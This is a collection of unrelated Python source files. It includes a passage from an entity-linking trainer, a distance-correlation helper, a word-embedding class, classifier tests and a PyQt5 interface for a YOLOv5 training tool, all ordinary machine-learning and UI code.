* (self.args.n_cands_before_rank - len(mask)) #if exist mask = 1 else =0 if self.args.language == 'en': lctx = m['context'][0].strip().split() lctx_ids = [self.prerank_model.word_voca.get_id(t) for t in lctx if utils.is_important_word(t)] lctx_ids = [tid for tid in lctx_ids if tid != self.prerank_model.word_voca.unk_id] #drop unk id word lctx_ids = lctx_ids[max(0, len(lctx_ids) - self.args.ctx_window//2):] #if lctx len >50 then drop the word before 50 words rctx = m['context'][1].strip().split() rctx_ids = [self.prerank_model.word_voca.get_id(t) for t in rctx if utils.is_important_word(t)] rctx_ids = [tid for tid in rctx_ids if tid != self.prerank_model.word_voca.unk_id] rctx_ids = rctx_ids[:min(len(rctx_ids), self.args.ctx_window//2)] elif self.args.language == 'zh': lctx = HanziConv.toSimplified(m['context'][0].strip()) lctx = jieba.lcut(lctx) lctx_ids = [self.prerank_model.word_voca.get_id(t) for t in lctx if utils.is_important_word(t)] lctx_ids = [tid for tid in lctx_ids if tid != self.prerank_model.word_voca.unk_id] lctx_ids = lctx_ids[max(0, len(lctx_ids) - self.args.ctx_window//2):] rctx = HanziConv.toSimplified(m['context'][1].strip()) rctx = jieba.lcut(rctx) rctx_ids = [self.prerank_model.word_voca.get_id(t) for t in rctx if utils.is_important_word(t)] rctx_ids = [tid for tid in rctx_ids if tid != self.prerank_model.word_voca.unk_id] rctx_ids = rctx_ids[:min(len(rctx_ids), self.args.ctx_window//2)] ment = m['mention'].strip().split() ment_ids = [self.prerank_model.word_voca.get_id(t) for t in ment if utils.is_important_word(t)] ment_ids = [tid for tid in ment_ids if tid != self.prerank_model.word_voca.unk_id] m['sent'] = ' '.join(lctx + rctx) # secondary local context (for computing relation scores) #snd_local context only have small len(before '') if conll_doc is not None: conll_m = m['conll_m'] sent = conll_doc['sentences'][conll_m['sent_id']] start = conll_m['start'] end = conll_m['end'] snd_lctx = [self.model.snd_word_voca.get_id(t) for t in sent[max(0, start - self.args.snd_local_ctx_window//2):start]] snd_rctx = [self.model.snd_word_voca.get_id(t) for t in sent[end:min(len(sent), end + self.args.snd_local_ctx_window//2)]] snd_ment = [self.model.snd_word_voca.get_id(t) for t in sent[start:end]] if len(snd_lctx) == 0: snd_lctx = [self.model.snd_word_voca.unk_id] if len(snd_rctx) == 0: snd_rctx = [self.model.snd_word_voca.unk_id] if len(snd_ment) == 0: snd_ment = [self.model.snd_word_voca.unk_id] else: snd_lctx = [self.model.snd_word_voca.unk_id] snd_rctx = [self.model.snd_word_voca.unk_id] snd_ment = [self.model.snd_word_voca.unk_id] items.append({'context': (lctx_ids, rctx_ids), 'snd_ctx': (snd_lctx, snd_rctx), 'ment_ids': ment_ids, 'snd_ment': snd_ment, 'cands': cands, 'named_cands': named_cands, 'p_e_m': p_e_m, 'mask': mask, 'true_pos': true_pos, 'doc_name': doc_name, 'raw': m }) count += 1 if len(items) > 0: # note: this shouldn't affect the order of prediction because we use doc_name to add predicted entities, # and we don't shuffle the data for prediction if len(items) > 100: print(len(items)) #means this docs have >100 mentions for k in range(0, len(items), 100): data.append(items[k:min(len(items), k + 100)]) else: data.append(items) tEnd = time.time() print("It cost %.4f min" % ((tEnd - tStart)/60)) return self.prerank(data, predict) def train(self, org_train_dataset, org_dev_datasets, config): print('extracting training data') if self.args.language == 'en': train_dataset = self.get_data_items(org_train_dataset, data_name='aida-train', predict=False) elif 
self.args.language == 'zh': train_dataset = self.get_data_items(org_train_dataset, data_name='tackbp2015_train', predict=False) print('#train docs', len(train_dataset)) dev_datasets = [] for dname, data in org_dev_datasets: dev_datasets.append((dname, self.get_data_items(data,dname, predict=True))) print(dname, '#dev docs', len(dev_datasets[-1][1])) print('creating optimizer') optimizer = optim.Adam([p for p in self.model.parameters() if p.requires_grad], lr=config['lr']) #what is the model.parameters()? best_f1 = -1 not_better_count = 0 is_counting = False eval_after_n_epochs = self.args.eval_after_n_epochs for e in range(config['n_epochs']): shuffle(train_dataset) total_loss = 0 for dc, batch in enumerate(train_dataset): # each document is a minibatch self.model.train() optimizer.zero_grad() #change optimizer gradient to zero because the default gradient is not zero # convert data items to pytorch inputs token_ids = [m['context'][0] + m['context'][1] if len(m['context'][0]) + len(m['context'][1]) > 0 else [self.model.word_voca.unk_id] for m in batch] s_ltoken_ids = [m['snd_ctx'][0] for m in batch] s_rtoken_ids = [m['snd_ctx'][1] for m in batch] s_mtoken_ids = [m['snd_ment'] for m in batch] entity_ids = Variable(torch.LongTensor([m['selected_cands']['cands'] for m in batch]).cuda()) true_pos = Variable(torch.LongTensor([m['selected_cands']['true_pos'] for m in batch]).cuda()) p_e_m = Variable(torch.FloatTensor([m['selected_cands']['p_e_m'] for m in batch]).cuda()) entity_mask = Variable(torch.FloatTensor([m['selected_cands']['mask'] for m in batch]).cuda()) token_ids, token_mask = utils.make_equal_len(token_ids, self.model.word_voca.unk_id) s_ltoken_ids, s_ltoken_mask = utils.make_equal_len(s_ltoken_ids, self.model.snd_word_voca.unk_id, to_right=False) s_rtoken_ids, s_rtoken_mask = utils.make_equal_len(s_rtoken_ids, self.model.snd_word_voca.unk_id) s_rtoken_ids = [l[::-1] for l in s_rtoken_ids] s_rtoken_mask = [l[::-1] for l in s_rtoken_mask] s_mtoken_ids, s_mtoken_mask = utils.make_equal_len(s_mtoken_ids, self.model.snd_word_voca.unk_id) token_ids = Variable(torch.LongTensor(token_ids).cuda()) token_mask = Variable(torch.FloatTensor(token_mask).cuda()) # too ugly but too lazy to fix it self.model.s_ltoken_ids = Variable(torch.LongTensor(s_ltoken_ids).cuda()) self.model.s_ltoken_mask = Variable(torch.FloatTensor(s_ltoken_mask).cuda()) self.model.s_rtoken_ids = Variable(torch.LongTensor(s_rtoken_ids).cuda()) self.model.s_rtoken_mask = Variable(torch.FloatTensor(s_rtoken_mask).cuda()) self.model.s_mtoken_ids = Variable(torch.LongTensor(s_mtoken_ids).cuda()) self.model.s_mtoken_mask = Variable(torch.FloatTensor(s_mtoken_mask).cuda()) scores = self.model.forward(token_ids, token_mask, entity_ids, entity_mask, p_e_m, gold=true_pos.view(-1, 1)) loss = self.model.loss(scores, true_pos) loss.backward() optimizer.step() self.model.regularize(max_norm=100) loss = loss.cpu().data.numpy() total_loss += loss print('epoch', e, "%0.2f%%" % (dc/len(train_dataset) * 100), loss, end='\r') print('epoch', e, 'total loss', total_loss, total_loss / len(train_dataset)) if (e + 1) % eval_after_n_epochs == 0: dev_f1 = 0 for di, (dname, data) in enumerate(dev_datasets): predictions = self.predict(data) f1 = D.eval(org_dev_datasets[di][1], predictions) print(dname, utils.tokgreen('micro F1: ' + str(f1))) if dname == 'aida-A' or dname == 'tackbp2015_dev': dev_f1 = f1 if config['lr'] == 1e-4 and dev_f1 >= self.args.dev_f1_change_lr: eval_after_n_epochs = 2 is_counting = True best_f1 = dev_f1 not_better_count = 0 
config['lr'] = 1e-5 print('change learning rate to', config['lr']) if self.args.mulrel_type == 'rel-norm': optimizer = optim.Adam([p for p in self.model.parameters() if p.requires_grad], lr=config['lr']) elif self.args.mulrel_type == 'ment-norm': for param_group in optimizer.param_groups: param_group['lr'] = config['lr'] if is_counting: if dev_f1 < best_f1: not_better_count += 1 else: not_better_count = 0 best_f1 = dev_f1 print('save model to', self.args.model_path) self.model.save(self.args.model_path) if not_better_count == self.args.n_not_inc: break self.model.print_weight_norm() def predict(self, data): predictions = {items[0]['doc_name']: [] for items in data} self.model.eval() for batch in data: # each document is a minibatch token_ids = [m['context'][0] + m['context'][1] if len(m['context'][0]) + len(m['context'][1]) > 0 else [self.model.word_voca.unk_id] for m in batch] s_ltoken_ids = [m['snd_ctx'][0] for m in batch] s_rtoken_ids = [m['snd_ctx'][1] for m in batch] s_mtoken_ids = [m['snd_ment'] for m in batch] lctx_ids = s_ltoken_ids rctx_ids = s_rtoken_ids m_ids = s_mtoken_ids entity_ids = Variable(torch.LongTensor([m['selected_cands']['cands'] for m in batch]).cuda()) p_e_m = Variable(torch.FloatTensor([m['selected_cands']['p_e_m'] for m in batch]).cuda()) entity_mask = Variable(torch.FloatTensor([m['selected_cands']['mask'] for m in batch]).cuda()) true_pos = Variable(torch.LongTensor([m['selected_cands']['true_pos'] for m in batch]).cuda()) token_ids, token_mask = utils.make_equal_len(token_ids, self.model.word_voca.unk_id) s_ltoken_ids, s_ltoken_mask = utils.make_equal_len(s_ltoken_ids, self.model.snd_word_voca.unk_id, to_right=False) s_rtoken_ids, s_rtoken_mask = utils.make_equal_len(s_rtoken_ids, self.model.snd_word_voca.unk_id) s_rtoken_ids = [l[::-1] for l in s_rtoken_ids] s_rtoken_mask = [l[::-1] for l in s_rtoken_mask] s_mtoken_ids, s_mtoken_mask = utils.make_equal_len(s_mtoken_ids, self.model.snd_word_voca.unk_id) token_ids = Variable(torch.LongTensor(token_ids).cuda()) token_mask = Variable(torch.FloatTensor(token_mask).cuda()) # too ugly, but too lazy to fix it self.model.s_ltoken_ids = Variable(torch.LongTensor(s_ltoken_ids).cuda()) self.model.s_ltoken_mask = Variable(torch.FloatTensor(s_ltoken_mask).cuda()) self.model.s_rtoken_ids = Variable(torch.LongTensor(s_rtoken_ids).cuda()) self.model.s_rtoken_mask = Variable(torch.FloatTensor(s_rtoken_mask).cuda()) self.model.s_mtoken_ids = Variable(torch.LongTensor(s_mtoken_ids).cuda()) self.model.s_mtoken_mask = Variable(torch.FloatTensor(s_mtoken_mask).cuda()) scores = self.model.forward(token_ids, token_mask, entity_ids, entity_mask, p_e_m, gold=true_pos.view(-1, 1)) scores = scores.cpu().data.numpy() # print out relation weights if self.args.mode == 'eval' and self.args.print_rel: print('================================') weights = self.model._rel_ctx_ctx_weights.cpu().data.numpy() voca = self.model.snd_word_voca for i in range(len(batch)): print(' '.join([voca.id2word[id] for id in lctx_ids[i]]), utils.tokgreen(' '.join([voca.id2word[id] for id in m_ids[i]])), ' '.join([voca.id2word[id] for id in rctx_ids[i]])) for j in range(len(batch)): if i == j: continue np.set_printoptions(precision=2) print('\t', weights[:, i, j], '\t', ' '.join([voca.id2word[id] for id in lctx_ids[j]]), utils.tokgreen(' '.join([voca.id2word[id] for id in m_ids[j]])), ' '.join([voca.id2word[id] for id in rctx_ids[j]])) pred_ids = np.argmax(scores, axis=1) pred_entities = [m['selected_cands']['named_cands'][i] if m['selected_cands']['mask'][i] == 1 
else (m['selected_cands']['named_cands'][0] if m['selected_cands']['mask'][0] == 1 else 'NIL') for (i, m) in zip(pred_ids, batch)] doc_names = [m['doc_name'] for m in batch] if self.args.mode == 'eval' and self.args.print_incorrect: gold = [item['selected_cands']['named_cands'][item['selected_cands']['true_pos']] if item['selected_cands']['true_pos'] >= 0 else 'UNKNOWN' for item in batch] pred = pred_entities for i in range(len(gold)): if gold[i] != pred[i]: print('--------------------------------------------') pprint(batch[i]['raw']) print(gold[i], pred[i]) if self.args.mode == 'eval' and self.args.print_correct: gold = [item['selected_cands']['named_cands'][item['selected_cands']['true_pos']] if item['selected_cands']['true_pos'] >= 0 else 'UNKNOWN' for item in batch] pred = pred_entities for i in range(len(gold)): if gold[i] == pred[i]: print('--------------------------------------------') pprint(batch[i]['raw']) print(gold[i], pred[i]) for dname, entity in zip(doc_names, pred_entities): predictions[dname].append({'pred': (entity, 0.)}) return predictions
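# The trainer above pads every mention's candidate list up to a fixed
# n_cands_before_rank and keeps a parallel 0/1 mask so padded slots can be
# ignored by the model. Below is a minimal sketch of that padding scheme;
# UNK_ID, UNK_TOKEN and the default length are illustrative stand-ins, not
# this project's actual vocabulary or configuration objects.
UNK_ID = 0
UNK_TOKEN = '#UNK#'

def pad_candidates(cands, named_cands, p_e_m, n_cands_before_rank=30):
    """Pad candidate ids/names/priors to a fixed length and build a 0/1 mask."""
    mask = [1.] * len(cands)
    missing = n_cands_before_rank - len(cands)
    if missing > 0:
        cands = cands + [UNK_ID] * missing
        named_cands = named_cands + [UNK_TOKEN] * missing
        p_e_m = p_e_m + [1e-8] * missing
        mask = mask + [0.] * missing
    return cands, named_cands, p_e_m, mask

# Example: pad_candidates([11, 42], ['A', 'B'], [0.7, 0.3], 5)
# -> mask == [1., 1., 0., 0., 0.]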
# coding=utf-8
# 20160510
# __author__ = 'xhcao'
import numpy as np
import scipy.spatial as sp

# Intended usage:
#   A = self.method.distance_correction_for_one_matrix(X, dimension)
#   B = self.method.distance_correction_for_one_matrix(Y, dimension)
#   corr_matrix[i, j] = self.method.distance_correlation(A, B)


def distance_correction_for_one_matrix(x, dimension):
    # x is one sample as an ndarray; each column of the matrix is one feature of the sample
    # akl: pairwise Minkowski distances of order `dimension`
    n = x.shape[0]
    akl = sp.distance.cdist(x, x, 'minkowski', p=dimension)
    # ak*: row means
    ak_ = np.zeros(n)
    for i in range(0, n):
        ak_[i] = np.sum(akl[i, :]) / n
    # a*l: column means
    a_l = np.zeros(n)
    for i in range(0, n):
        a_l[i] = np.sum(akl[:, i]) / n
    # a**: grand mean
    a__ = np.mean(akl)
    # double-centered distance matrix
    res = akl - (np.ones((n, n)) * ak_).T
    res = res - np.ones((n, n)) * a_l
    res = res + np.ones((n, n)) * a__
    return res


def distance_correlation(A, B):
    # compute the distance correlation between two double-centered samples
    A_B = np.mean(A * B)
    A_A = np.mean(A * A)
    B_B = np.mean(B * B)
    if A_A * B_B > 0:
        return A_B / np.sqrt(A_A * B_B)
    else:
        return 0
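# A minimal usage sketch for the two helpers above: double-center the pairwise
# distance matrix of each sample, then take their distance correlation.
# The random arrays below are purely illustrative.
if __name__ == '__main__':
    rng = np.random.RandomState(0)
    X = rng.rand(20, 3)  # 20 observations, 3 features
    Y = rng.rand(20, 4)  # 20 observations, 4 features
    A = distance_correction_for_one_matrix(X, dimension=2)  # dimension is the Minkowski order
    B = distance_correction_for_one_matrix(Y, dimension=2)
    print(distance_correlation(A, B))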
import numpy as np from collections import OrderedDict from sklearn import preprocessing # This file contains the WordVectors class used to load and handle word embeddings def intersection(*args): """ This function returns the intersection between WordVectors objects I.e.: all words that occur in both objects simultaneously as well as their respective word vectors Returns: list(WordVectors) objects with intersecting words """ if len(args) < 2: print("! Error: intersection requires at least 2 WordVector objects") return None # Get intersecting words # WARNING: using set intersection will affect the order of words # in the original word vectors, to keep results consistent # it is better to iterate over the list of words # the resulting order will follow the first WordVectors's order # Get intersecting words common_words = set.intersection(*[set(wv.words) for wv in args]) # Get intersecting words following the order of first WordVector words = [w for w in args[0].words if w in common_words] # Retrieve vectors from a and b for intersecting words wv_out = list() # list of output WordVectors for wv in args: wv_out.append(WordVectors(words=words, vectors=[wv[w]for w in words])) return wv_out def union(*args, f="average"): """ Performs union of two or more word vectors, returning a new WordVectors containing union of words and combination of vectors according to given function. Arguments: *args - list of WordVectors objects f - (str) function to use when combining word vectors (default to average) Returns: wv - WordVectors as the union the input args """ if f == 'average': f = lambda x: sum(x)/len(x) union_words = set.union(*[set(wv.words) for wv in args]) words = list(union_words) vectors = np.zeros((len(words), args[0].dimension), dtype=float) for i, w in enumerate(words): # Get list of existing vectors for w vecs = np.array([wv[w] for wv in args if w in wv]) vectors[i] = f(vecs) # Combine vectors wv_out = WordVectors(words=words, vectors=vectors) return wv_out # Implements a WordVector class that performs mapping of word tokens to vectors # Stores words as class WordVectors: """ WordVectors class containing methods for handling the mapping of words to vectors. 
Attributes - word_id -- OrderedDict mapping word to id in list of vectors - words -- list of words mapping id (index) to word string - vectors -- n x dim matrix of word vectors, follows id order - counts -- not used at the moment, designed to store word count - dimension -- dimension of wordvectors - zipped -- a zipped list of (word, vec) used to construct the object - min_freq -- filter out words whose frequency is less than min_freq """ def __init__(self, words=None, vectors=None, counts=None, zipped=None, input_file=None, centered=True, normalized=False, min_freq=0, word_frequency=None): if words is not None and vectors is not None: self.word_id = OrderedDict() self.words = list() for i, w in enumerate(words): self.word_id[w] = i self.words = list(words) self.vectors = np.array(vectors) self.counts = counts self.dimension = len(vectors[0]) elif zipped: pass elif input_file: self.dimension = 0 self.word_id = dict() self.words = list() self.counts = dict() self.vectors = None self.read_file(input_file) if centered: self.center() if normalized: self.normalize() if word_frequency: self.filter_frequency(min_freq, word_frequency) def center(self): self.vectors = self.vectors - self.vectors.mean(axis=0, keepdims=True) def normalize(self): self.vectors = preprocessing.normalize(self.vectors, norm="l2") def get_words(self): return self.word_id.keys() # Returns a numpy (m, dim) array for a given list of words # I.e.: select vectors whose word are in argument words def get_vectors_from_words(self, words): vectors = np.zeros((len(words), self.dimension)) for i, w in enumerate(words): vectors[i] = self[w] return vectors # Return (word,vec) for given word # In future versions may only return self.vectors def loc(self, word, return_word=False): if return_word: return word, self.vectors[self.word_id[word]] else: return self.vectors[self.word_id[word]] def get_count(self, word): return self.freq[self.word_id[word]] # Get word, vector pair from id def iloc(self, id_query, return_word=False): if return_word: return self.words[id_query], self.vectors[id_query] else: return self.vectors[id_query] # Overload [], given word w returns its vector def __getitem__(self, key): if isinstance(key, int) or isinstance(key, np.int64): return self.iloc(key) elif isinstance(key, slice): # slice return ([w for w in self.words[key.start: key.stop]], [v for v in self.vectors[key.start: key.stop]]) return self.loc(key) def __len__(self): return len(self.words) def __contains__(self, word): return word in self.word_id def filter_frequency(self, min_freq, word_frequency): print("Filtering %d" % min_freq) words_kept = list() vectors_kept = list() for word, vec in zip(self.words, self.vectors): if word in word_frequency and word_frequency[word] > min_freq: words_kept.append(word) vectors_kept.append(vec) self.words = words_kept self.vectors = np.array(vectors_kept) self.word_id = OrderedDict() for i, w in enumerate(self.words): self.word_id[w] = i print(" - Found %d words" % len(self.words)) # Read file in following format: # n_items dim def read_file(self, path): with open(path) as fin: n_words, dim = map(int, fin.readline().rstrip().split(" ", 1)) self.dimension = dim # print("Reading WordVectors (%d,%d)" % (n_words, dim)) # Use this function to process line reading in map def process_line(s): s = s.rstrip().split(" ", 1) w = s[0] v = np.array(s[1].split(" "), dtype=float) return w, v data = map(process_line, fin.readlines()) self.words, self.vectors = zip(*data) self.words = list(self.words) self.word_id = {w: i for i, w in 
enumerate(self.words)} self.vectors = np.array(self.vectors, dtype=float) def save_txt(self, path): with open(path, "w") as fout: fout.write("%d %d\n" % (len(self.word_id), self.dimension)) for word, vec in zip(self.words, self.vectors): v_string = " ".join(map(str, vec)) fout.write("%s %s\n" % (word, v_string))
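# A small usage sketch for the WordVectors class and the intersection/union
# helpers above; the toy vocabularies and vectors are illustrative only.
if __name__ == "__main__":
    wv_a = WordVectors(words=["cat", "dog", "fish"],
                       vectors=[[1.0, 0.0], [0.0, 1.0], [1.0, 1.0]])
    wv_b = WordVectors(words=["dog", "cat"],
                       vectors=[[0.5, 0.5], [1.0, 0.5]])
    common_a, common_b = intersection(wv_a, wv_b)  # same words, same order
    merged = union(wv_a, wv_b)                     # averaged vectors for shared words
    print(common_a.words, merged["cat"])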
from tests.utils_testing import * X = iris.data y = iris.target def test_train_then_predict(): gt = GeneticTree(max_iter=10, mutation_prob=0.3) gt.fit(X, y) y_pred = gt.predict(X) assert y_pred.shape[0] == X.shape[0] unique_classes = set(np.unique(y)) for i in range(y_pred.shape[0]): assert unique_classes.__contains__(y_pred[i]) def test_train_then_predict_proba(): gt = GeneticTree(max_iter=10, initialization=Initialization.Full, initial_depth=10) gt.fit(X, y) y_pred = gt.predict_proba(X) assert y_pred.shape[0] == X.shape[0] unique_classes = set(np.unique(y)) assert y_pred.shape[1] == len(unique_classes) for i in range(y_pred.shape[0]): assert_almost_equal(np.sum(y_pred[i]), 1) def test_get_best_params(): cross_prob = [0.2, 0.4, 0.6, 0.8] accuracy_best = [] for i in range(len(cross_prob)): gt = GeneticTree(max_iter=10, cross_prob=cross_prob[i]) gt.fit(X, y) accuracy_best.append(gt.acc_best[-1]) assert len(accuracy_best) == len(cross_prob) best_accuracy_id = np.argmax(np.array(accuracy_best)) print(f"Best accuracy is for cross prob: {cross_prob[best_accuracy_id]}") def test_train_model_many_times(): gt = GeneticTree(max_iter=10, keep_last_population=True) gt.fit(X, y) for i in range(10): weights = np.ones(150) print(f"Score: {np.sum(gt.predict(X) == y)}") weights[gt.predict(X) != y] += 0.5 gt.partial_fit(X, y, sample_weight=weights)
# -*- coding: utf-8 -*- # Form implementation generated from reading ui file 'Yolov5TrainGuide.ui' # # Created by: PyQt5 UI code generator 5.15.4 # # WARNING: Any manual changes made to this file will be lost when pyuic5 is # run again. Do not edit this file unless you know what you are doing. from PyQt5 import QtCore, QtGui, QtWidgets class Ui_Yolov5TrainGuide(object): def setupUi(self, Yolov5TrainGuide): Yolov5TrainGuide.setObjectName("Yolov5TrainGuide") Yolov5TrainGuide.resize(962, 911) self.groupBox = QtWidgets.QGroupBox(Yolov5TrainGuide) self.groupBox.setGeometry(QtCore.QRect(10, 50, 941, 111)) self.groupBox.setObjectName("groupBox") self.create_dir = QtWidgets.QPushButton(self.groupBox) self.create_dir.setGeometry(QtCore.QRect(230, 70, 171, 31)) self.create_dir.setObjectName("create_dir") self.prepare = QtWidgets.QPushButton(self.groupBox) self.prepare.setGeometry(QtCore.QRect(530, 70, 171, 31)) self.prepare.setObjectName("prepare") self.layoutWidget = QtWidgets.QWidget(self.groupBox) self.layoutWidget.setGeometry(QtCore.QRect(10, 30, 921, 35)) self.layoutWidget.setObjectName("layoutWidget") self.horizontalLayout = QtWidgets.QHBoxLayout(self.layoutWidget) self.horizontalLayout.setContentsMargins(0, 0, 0, 0) self.horizontalLayout.setObjectName("horizontalLayout") self.label = QtWidgets.QLabel(self.layoutWidget) self.label.setObjectName("label") self.horizontalLayout.addWidget(self.label) self.location = QtWidgets.QLineEdit(self.layoutWidget) self.location.setMinimumSize(QtCore.QSize(340, 31)) self.location.setObjectName("location") self.horizontalLayout.addWidget(self.location) self.browse = QtWidgets.QPushButton(self.layoutWidget) self.browse.setMinimumSize(QtCore.QSize(0, 31)) self.browse.setObjectName("browse") self.horizontalLayout.addWidget(self.browse) self.label_2 = QtWidgets.QLabel(self.layoutWidget) self.label_2.setObjectName("label_2") self.horizontalLayout.addWidget(self.label_2) self.data_name = QtWidgets.QLineEdit(self.layoutWidget) self.data_name.setMinimumSize(QtCore.QSize(131, 31)) self.data_name.setObjectName("data_name") self.horizontalLayout.addWidget(self.data_name) self.label_3 = QtWidgets.QLabel(self.layoutWidget) self.label_3.setObjectName("label_3") self.horizontalLayout.addWidget(self.label_3) self.per = QtWidgets.QSpinBox(self.layoutWidget) self.per.setMinimumSize(QtCore.QSize(0, 33)) self.per.setProperty("value", 90) self.per.setObjectName("per") self.horizontalLayout.addWidget(self.per) self.label_7 = QtWidgets.QLabel(self.layoutWidget) self.label_7.setObjectName("label_7") self.horizontalLayout.addWidget(self.label_7) self.groupBox_2 = QtWidgets.QGroupBox(Yolov5TrainGuide) self.groupBox_2.setGeometry(QtCore.QRect(10, 160, 941, 121)) self.groupBox_2.setObjectName("groupBox_2") self.layoutWidget1 = QtWidgets.QWidget(self.groupBox_2) self.layoutWidget1.setGeometry(QtCore.QRect(10, 30, 921, 56)) self.layoutWidget1.setObjectName("layoutWidget1") self.horizontalLayout_2 = QtWidgets.QHBoxLayout(self.layoutWidget1) self.horizontalLayout_2.setContentsMargins(0, 0, 0, 0) self.horizontalLayout_2.setObjectName("horizontalLayout_2") self.label_4 = QtWidgets.QLabel(self.layoutWidget1) self.label_4.setObjectName("label_4") self.horizontalLayout_2.addWidget(self.label_4) self.model_size = QtWidgets.QComboBox(self.layoutWidget1) self.model_size.setMinimumSize(QtCore.QSize(101, 31)) self.model_size.setObjectName("model_size") self.model_size.addItem("") self.model_size.addItem("") self.model_size.addItem("") self.model_size.addItem("") 
self.horizontalLayout_2.addWidget(self.model_size) self.label_6 = QtWidgets.QLabel(self.layoutWidget1) self.label_6.setObjectName("label_6") self.horizontalLayout_2.addWidget(self.label_6) self.batch_size = QtWidgets.QSpinBox(self.layoutWidget1) self.batch_size.setMinimumSize(QtCore.QSize(71, 33)) self.batch_size.setMinimum(1) self.batch_size.setMaximum(99999999) self.batch_size.setProperty("value", 16) self.batch_size.setObjectName("batch_size") self.horizontalLayout_2.addWidget(self.batch_size) self.label_5 = QtWidgets.QLabel(self.layoutWidget1) self.label_5.setObjectName("label_5") self.horizontalLayout_2.addWidget(self.label_5) self.epochs = QtWidgets.QSpinBox(self.layoutWidget1) self.epochs.setMinimumSize(QtCore.QSize(71, 33)) self.epochs.setMinimum(5) self.epochs.setMaximum(99999999) self.epochs.setProperty("value", 300) self.epochs.setObjectName("epochs") self.horizontalLayout_2.addWidget(self.epochs) self.label_8 = QtWidgets.QLabel(self.layoutWidget1) self.label_8.setObjectName("label_8") self.horizontalLayout_2.addWidget(self.label_8) self.gpuNum = QtWidgets.QSpinBox(self.layoutWidget1) self.gpuNum.setMinimumSize(QtCore.QSize(71, 33)) self.gpuNum.setMinimum(0) self.gpuNum.setMaximum(1) self.gpuNum.setProperty("value", 1) self.gpuNum.setObjectName("gpuNum") self.horizontalLayout_2.addWidget(self.gpuNum) self.verticalLayout = QtWidgets.QVBoxLayout() self.verticalLayout.setObjectName("verticalLayout") self.default_model = QtWidgets.QRadioButton(self.layoutWidget1) self.default_model.setChecked(True) self.default_model.setObjectName("default_model") self.verticalLayout.addWidget(self.default_model) self.other_model = QtWidgets.QRadioButton(self.layoutWidget1) self.other_model.setObjectName("other_model") self.verticalLayout.addWidget(self.other_model) self.horizontalLayout_2.addLayout(self.verticalLayout) self.generate_code = QtWidgets.QPushButton(self.groupBox_2) self.generate_code.setGeometry(QtCore.QRect(230, 80, 171, 31)) self.generate_code.setMinimumSize(QtCore.QSize(0, 31)) self.generate_code.setObjectName("generate_code") self.choose_model = QtWidgets.QPushButton(self.groupBox_2) self.choose_model.setGeometry(QtCore.QRect(530, 80, 171, 31)) self.choose_model.setMinimumSize(QtCore.QSize(0, 31)) self.choose_model.setObjectName("choose_model") self.groupBox_3 = QtWidgets.QGroupBox(Yolov5TrainGuide) self.groupBox_3.setGeometry(QtCore.QRect(10, 280, 941, 621)) self.groupBox_3.setObjectName("groupBox_3") self.textBrowser = QtWidgets.QTextBrowser(self.groupBox_3) self.textBrowser.setGeometry(QtCore.QRect(10, 70, 921, 541)) self.textBrowser.setObjectName("textBrowser") self.startTrain = QtWidgets.QPushButton(self.groupBox_3) self.startTrain.setGeometry(QtCore.QRect(730, 30, 101, 31)) self.startTrain.setObjectName("startTrain") self.terminateTrain = QtWidgets.QPushButton(self.groupBox_3) self.terminateTrain.setGeometry(QtCore.QRect(840, 30, 91, 31)) self.terminateTrain.setObjectName("terminateTrain") self.layoutWidget2 = QtWidgets.QWidget(self.groupBox_3) self.layoutWidget2.setGeometry(QtCore.QRect(20, 30, 700, 33)) self.layoutWidget2.setObjectName("layoutWidget2") self.horizontalLayout_3 = QtWidgets.QHBoxLayout(self.layoutWidget2) self.horizontalLayout_3.setContentsMargins(0, 0, 0, 0) self.horizontalLayout_3.setObjectName("horizontalLayout_3") self.useCondaEnv = QtWidgets.QCheckBox(self.layoutWidget2) self.useCondaEnv.setMinimumSize(QtCore.QSize(0, 31)) self.useCondaEnv.setObjectName("useCondaEnv") self.horizontalLayout_3.addWidget(self.useCondaEnv) self.envName = 
QtWidgets.QLineEdit(self.layoutWidget2) self.envName.setEnabled(True) self.envName.setMinimumSize(QtCore.QSize(400, 31)) self.envName.setReadOnly(True) self.envName.setObjectName("envName") self.horizontalLayout_3.addWidget(self.envName) self.browseConda = QtWidgets.QPushButton(self.layoutWidget2) self.browseConda.setMinimumSize(QtCore.QSize(0, 31)) self.browseConda.setObjectName("browseConda") self.horizontalLayout_3.addWidget(self.browseConda) self.label_9 = QtWidgets.QLabel(Yolov5TrainGuide) self.label_9.setGeometry(QtCore.QRect(100, 10, 761, 41)) font = QtGui.QFont() font.setPointSize(25) self.label_9.setFont(font) self.label_9.setAlignment(QtCore.Qt.AlignCenter) self.label_9.setObjectName("label_9") self.retranslateUi(Yolov5TrainGuide) QtCore.QMetaObject.connectSlotsByName(Yolov5TrainGuide) def retranslateUi(self, Yolov5TrainGuide): _translate = QtCore.QCoreApplication.translate Yolov5TrainGuide.setWindowTitle(_translate("Yolov5TrainGuide", "Yolov5 Train Guide")) self.groupBox.setTitle(_translate("Yolov5TrainGuide", "Dataset Preparation")) self.create_dir.setText(_translate("Yolov5TrainGuide", "Create Dir")) self.prepare.setText(_translate("Yolov5TrainGuide", "Generate Training Data")) self.label.setText(_translate("Yolov5TrainGuide", "Location")) self.browse.setText(_translate("Yolov5TrainGuide", "Browse")) self.label_2.setText(_translate("Yolov5TrainGuide", "Data Name")) self.label_3.setText(_translate("Yolov5TrainGuide", "Train Persentage")) self.label_7.setText(_translate("Yolov5TrainGuide", "%")) self.groupBox_2.setTitle(_translate("Yolov5TrainGuide", "Train Option")) self.label_4.setText(_translate("Yolov5TrainGuide", "Model Size")) self.model_size.setItemText(0, _translate("Yolov5TrainGuide", "small (s)")) self.model_size.setItemText(1, _translate("Yolov5TrainGuide", "mediun (m)")) self.model_size.setItemText(2, _translate("Yolov5TrainGuide", "large (l)")) self.model_size.setItemText(3, _translate("Yolov5TrainGuide", "extra large (x)")) self.label_6.setText(_translate("Yolov5TrainGuide", "Batch Size")) self.label_5.setText(_translate("Yolov5TrainGuide", "Train Epochs")) self.label_8.setText(_translate("Yolov5TrainGuide", "Use GPU Num")) self.default_model.setText(_translate("Yolov5TrainGuide", "Use Default Model Weight")) self.other_model.setText(_translate("Yolov5TrainGuide", "Use Other Model Weight")) self.generate_code.setText(_translate("Yolov5TrainGuide", "Generate Code")) self.choose_model.setText(_translate("Yolov5TrainGuide", "Choose Model")) self.groupBox_3.setTitle(_translate("Yolov5TrainGuide", "Message")) self.startTrain.setText(_translate("Yolov5TrainGuide", "Start Train")) self.terminateTrain.setText(_translate("Yolov5TrainGuide", "Terminate")) self.useCondaEnv.setText(_translate("Yolov5TrainGuide", "Choose Conda Env Dir")) 